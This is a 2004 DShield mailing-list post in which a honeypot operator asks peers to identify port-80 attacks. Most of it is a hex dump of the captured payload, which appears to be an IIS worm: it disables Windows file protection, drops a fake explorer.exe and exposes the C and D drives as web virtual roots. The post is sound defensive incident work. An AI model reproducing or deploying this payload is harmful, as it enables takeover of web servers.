[Dshield] What is this Probing/Attacking port 80

Brian Jameson bjameson at cix.co.uk
Sat Jan 24 12:12:45 GMT 2004


I've seen this pattern probing/attacking port 80 on my honey pot on a few
occasions over the last couple of weeks but never 3 in such a short time
span from three widely spread IP addresses (Kenya, Philippines and Russia).
Does anyone know what it is? See dump from Acid below:-

regards,
Brian

 length = 982

000 : 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0   ..$@.....h.$@.h.
010 : 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40    @.h.$@.j.U.5.$@
020 : 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B   ..`.....uI..$@..
030 : C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81   .t at .. @..>.t6Ff.
040 : 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20   ~.,,u...217....
050 : 40 00 89 35 D0 24 40 00 FF 35 D0 24 40 00 68 D0   @..5.$@..5.$@.h.
060 : 20 40 00 6A 01 6A 00 55 FF 35 D8 24 40 00 E8 19    @.j.j.U.5.$@...
070 : 00 00 00 C3 FF 25 60 30 40 00 FF 25 64 30 40 00   .....%`0 at ..%d0 at .
080 : FF 25 68 30 40 00 FF 25 70 30 40 00 FF 25 74 30   .%h0 at ..%p0 at ..%t0
090 : 40 00 FF 25 78 30 40 00 FF 25 7C 30 40 FC FC FC   @..%x0 at ..%|0 at ...
0a0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
0b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 5C 45 58   .............\EX
0c0 : 50 4C 4F 52 45 52 2E 45 58 45 00 00 00 53 4F 46   PLORER.EXE...SOF
0d0 : 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C   TWARE\Microsoft\
0e0 : 57 69 6E 64 6F 77 73 20 4E 54 5C 43 75 72 72 65   Windows NT\Curre
0f0 : 6E 74 56 65 72 73 69 6F 6E 5C 57 69 6E 6C 6F 67   ntVersion\Winlog
100 : 6F 6E 00 00 00 53 46 43 44 69 73 61 62 6C 65 00   on...SFCDisable.
110 : 00 9D FF FF FF 53 59 53 54 45 4D 5C 43 75 72 72   .....SYSTEM\Curr
120 : 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65   entControlSet\Se
130 : 72 76 69 63 65 73 5C 57 33 53 56 43 5C 50 61 72   rvices\W3SVC\Par
140 : 61 6D 65 74 65 72 73 5C 56 69 72 74 75 61 6C 20   ameters\Virtual
150 : 52 6F 6F 74 73 00 00 00 00 2F 53 63 72 69 70 74   Roots..../Script
160 : 73 00 00 00 00 2F 4D 53 41 44 43 00 00 2F 43 00   s..../MSADC../C.
170 : 00 2F 44 00 00 63 3A 5C 2C 2C 32 31 37 00 00 00   ./D..c:\,,217...
180 : 00 64 3A 5C 2C 2C 32 31 37 FC FC FC FC FC FC FC   .d:\,,217.......
190 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
1a0 : FC FC 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
1b0 : 00 00 00 00 00 00 3C 30 00 00 00 00 00 00 00 00   ......<0........
1c0 : 00 00 84 30 00 00 60 30 00 00 4C 30 00 00 00 00   ...0..`0..L0....
1d0 : 00 00 00 00 00 00 91 30 00 00 70 30 00 00 00 00   .......0..p0....
1e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
1f0 : 00 00 9E 30 00 00 A6 30 00 00 BE 30 00 00 00 00   ...0...0...0....
200 : 00 00 C8 30 00 00 DC 30 00 00 EE 30 00 00 FE 30   ...0...0...0...0
210 : 00 00 00 00 00 00 9E 30 00 00 A6 30 00 00 BE 30   .......0...0...0
220 : 00 00 00 00 00 00 C8 30 00 00 DC 30 00 00 EE 30   .......0...0...0
230 : 00 00 FE 30 00 00 00 00 00 00 4B 45 52 4E 45 4C   ...0......KERNEL
240 : 33 32 2E 64 6C 6C 00 41 44 56 41 50 49 33 32 2E   32.dll.ADVAPI32.
250 : 64 6C 6C 00 00 00 53 6C 65 65 70 00 00 00 47 65   dll...Sleep...Ge
260 : 74 57 69 6E 64 6F 77 73 44 69 72 65 63 74 6F 72   tWindowsDirector
270 : 79 41 00 00 00 00 57 69 6E 45 78 65 63 00 00 00   yA....WinExec...
280 : 52 65 67 51 75 65 72 79 56 61 6C 75 65 45 78 41   RegQueryValueExA
290 : 00 00 00 00 52 65 67 53 65 74 56 61 6C 75 65 45   ....RegSetValueE
2a0 : 78 41 00 00 00 00 52 65 67 4F 70 65 6E 4B 65 79   xA....RegOpenKey
2b0 : 45 78 41 00 00 00 52 65 67 43 6C 6F 73 65 4B 65   ExA...RegCloseKe
2c0 : 79 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   y...............
2d0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
2e0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
2f0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
300 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
310 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
320 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
330 : FC FC FC FC FC FC FC FC 00 00 00 00 00 00 00 00   ................
340 : 00 00 00 00 00 00 00 00 00 00 00 00 00 5E BF B9   .............^..
350 : 05 00 00 6A 07 E8 10 00 00 00 64 3A 5C 65 78 70   ...j......d:\exp
360 : 6C 6F 72 65 72 2E 65 78 65 00 8B 04 24 88 18 FF   lorer.exe...$...
370 : 55 CC 83 F8 FF 74 4D 89 85 4C FE FF FF AC 8A F8   U....tM..L......
380 : 38 3E 75 27 6A 20 E8 23 00 00 00 00 00 00 00 00   8>u'j .#........
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 6A 01 56 FF B5   ...........j.V..
3b0 : 4C FE FF FF FF 55 C8 46 4F 75 C5 FF B5 4C FE FF   L....U.FOu...L..
3c0 : FF FF 55 C4 FE C3 80 FB 64 0F 86 4C F9 FF FF C3   ..U.....d..L....
3d0 : 61 C9 C2 04 00 90                                 a.....




More information about the list mailing list